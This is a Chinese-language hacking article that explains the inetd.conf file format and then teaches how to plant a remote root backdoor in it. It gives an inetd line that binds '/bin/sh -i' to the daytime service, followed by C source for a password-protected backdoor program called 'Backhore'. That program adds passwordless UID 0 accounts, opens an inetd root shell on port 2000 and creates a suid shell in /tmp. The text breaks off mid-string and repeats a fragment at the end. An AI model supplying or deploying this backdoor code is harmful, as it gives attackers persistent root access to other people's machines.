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日期:2017/2/27 14:16:35   编辑:更多Linux

超級服務器守護進程(inetd)的配置文件。系統管理員一般情況下不經常檢查該文件,因此這倒是個放置“後門”的好地方。:) 那麼在這裡如何建立一個最好的後門呢?當然是遠程的了。這樣你就不必需要本地帳號就可以成為根用戶了。首先,讓我們先來了解一下這方面的基礎知識:inetd 進程負責監聽各個TCP和UDP端口的連接請求,並根據連接請求啟動相應的服務器進程。該配置文件 /etc/inetd.conf 很簡單,基本形式如下: (1) (2) (3) (4) (5) (6) (7) FTP stream tcp nowait root /usr/etc/ftpd ftpd talk dgram udp wait root /usr/etc/ntalkd ntalkd mountd/1 stream rpc/tcp wait root /usr/etc/mountd mountd 1:第一欄是服務名稱。服務名通過查詢 /etc/services 文件(供 TCP 和 UDP 服務使用)或 portmap 守護進程(供 RPC 服務使用)映射成端口號。RPC(遠程過程調用)服務由 name/num 的名字格式和第三欄中的 rpc 標志識別。 2:第二欄決定服務使用的套接口類型:stream、dgram 或 raw。一般說來,stream 用於 TCP 服務,dgram 用於 UDP, raw 的使用很少見。 3:第三欄標識服務使用的通信協議。允許的類型列在 protocols 文件中。協議幾乎總是是 tcp 或 udp。RPC 服務在協議類型前冠以 rpc/。 4:如果所說明的服務一次可處理多個請求(而不是處理一個請求後就退出),那麼第四欄應置成 wait,這樣可以阻止 inetd 持續地派生該守護進程的新拷貝。此選項用於處理大量的小請求的服務。如果 wait 不合適,那麼在本欄中填 nowait。 5:第五欄給出運行守護進程的用戶名。 6:第六欄給出守護進程的全限定路徑名。 7:守護進程的真實名字及其參數。 如果所要處理的工作微不足道(如不需要用戶交互),inetd 守護進程便自己處理。此時第六、七欄只需填上 'internal' 即可。所以,要安裝一個便利的後門,可以選擇一個不常被使用的服務,用可以產生某種後門的守護進程代替原先的守護進程。例如,讓其添加 UID 0 的帳號,或復制一個 suid shell。 一個比較好的方法之一,就是將用於提供日期時間的服務 daytime 替換為能夠產生一個 suid root 的 shell。只要將 /etc/inetd.conf 文件中的: daytime stream tcp nowait root internal 修改為: daytime stream tcp nowait /bin/sh sh -i. 然後重啟(記住:一定要重啟)inetd 進程: killall -9 inetd。 但更好、更隱蔽的方法是偽造網絡服務,讓它能夠在更難以察覺的情況下為我們提供後門,例如口令保護等。如果能夠在不通過 telnetd 連接的情況下輕松地進行遠程訪問,那是再好不過了。方法就是將“自己的”守護程序綁定到某個端口,該程序對外來連接不提供任何提示符,但只要直接輸入了正確的口令,就能夠順利地進入系統。以下是這種後門的一個示范程序。(注:這個程序寫得並不很完整。) <++> backdoor/remoteback.c /* Coders: Theft Help from: Sector9, Halogen Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle,halogen, Psionic, g0d, Psionic. Groups: Ethical Mutiny Crew(EMC), Common Purpose hackers(CPH), Global Hell(gH), Team Sploit, Hong Kong Danger Duo, Tg0d, EHAP. Usage: Setup: # gcc -o backhore backhore.c # ./backdoor passWord & Run: Telnet to the host on port 4000. After connected you Will not be prompted for a password, this way it is less Obvious, just type the password and press enter, after this You will be prompted for a command, pick 1-8.

Distributers: Ethical Mutiny Crew */ #include #include #include #include #include #include #include #include #define PORT 4000 #define MAXDATASIZE 100 #define BACKLOG 10 #define SA strUCt sockaddr void handle(int); int main(int argc, char *argv[]) { int sockfd, new_fd, sin_size, numbytes, cmd; char ask[10]="Command: "; char *bytes, *buf, pass[40]; struct sockaddr_in my_addr; struct sockaddr_in their_addr; printf("\n Backhore BETA by Theft\n"); printf(" 1: trojans rc.local\n"); printf(" 2: sends a systemwide message\n"); printf(" 3: binds a root shell on port 2000\n"); printf(" 4: creates suid sh in /tmp\n"); printf(" 5: creates mutiny account uid 0 no passwd\n"); printf(" 6: drops to suid shell\n"); printf(" 7: information on backhore\n"); printf(" 8: contact\n"); if (argc != 2) { fprintf(stderr,"Usage: %s password\n", argv[0]); exit(1); } strncpy(pass, argv[1], 40); printf("..using password: %s..\n", pass); if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); } my_addr.sin_family = AF_INET; my_addr.sin_port = htons(PORT); my_addr.sin_addr.s_addr = INADDR_ANY; if (bind(sockfd, (SA *)&my_addr, sizeof(SA)) == -1) { perror("bind"); exit(1); } if (listen(sockfd, BACKLOG) == -1) { perror("listen"); exit(1); } sin_size = sizeof(SA); while(1) { /* main accept() loop */ if ((new_fd = accept(sockfd, (SA *)&their_addr, &sin_size)) == -1) { perror("accept"); continue; } if (!fork()) { dup2(new_fd, 0); dup2(new_fd, 1); dup2(new_fd, 2); fgets(buf, 40, stdin); if (!strcmp(buf, pass)) { printf("%s", ask); cmd = getchar(); handle(cmd); } close(new_fd); exit(0); } close(new_fd); while(waitpid(-1,NULL,WNOHANG) > 0); /* rape the dying children */ } } void handle(int cmd) { FILE *fd; switch(cmd) { case '1': printf("\nBackhore BETA by Theft\n"); printf("[email protected]\n"); printf("Trojaning rc.local\n");

fd = fopen("/etc/passwd", "a+"); fprintf(fd, "mutiny::0:0:ethical mutiny crew:/root:/bin/sh"); fclose(fd); printf("Trojan complete.\n"); break; case '2': printf("\nBackhore BETA by Theft\n"); printf("[email protected]\n"); printf("Sending systemwide message..\n"); system("wall Box owned via the Ethical Mutiny Crew"); printf("Message sent.\n"); break; case '3': printf("\nBackhore BETA by Theft\n"); printf("[email protected]\n"); printf("\nAdding inetd backdoor... (-p)\n"); fd = fopen("/etc/services","a+"); fprintf(fd,"backdoor\t2000/tcp\tbackdoor\n"); fd = fopen("/etc/inetd.conf","a+"); fprintf(fd,"backdoor\tstream\ttcp\tnowait\troot\t/bin/sh -i\n"); execl("killall", "-HUP", "inetd", NULL); printf("\ndone.\n"); printf("telnet to port 2000\n\n"); break; case '4': printf("\nBackhore BETA by Theft\n"); printf("[email protected]\n"); printf("\nAdding Suid Shell... (-s)\n"); system("cp /bin/sh /tmp/.sh"); system("chmod 4700 /tmp/.sh"); system("chown root:root /tmp/.sh"); printf("\nSuid shell added.\n"); printf("execute /tmp/.sh\n\n"); break; case '5': printf("\nBackhore BETA by Theft\n"); printf("[email protected]\n"); printf("\nAdding root account... (-u)\n"); fd=fopen("/etc/passwd","a+"); fprintf(fd,"hax0r::0:0::/:/bin/bash\n"); printf("\ndone.\n"); printf("uid 0 and gid 0 account added\n\n"); break; case '6': printf("\nBackhore BETA by Theft\n"); printf("[email protected]\n"); printf("Executing suid shell..\n"); execl("/bin/sh"); break; case '7': printf("\nBackhore BETA by Theft\n"); printf("theft@c

break; case '6': printf("\nBackhore BETA by Theft\n"); printf("[email protected]\n"); printf("Executing suid shell..\n"); execl("/bin/sh"); break; case '7': printf("\nBackhore BETA by Theft\n"); printf("theft@c

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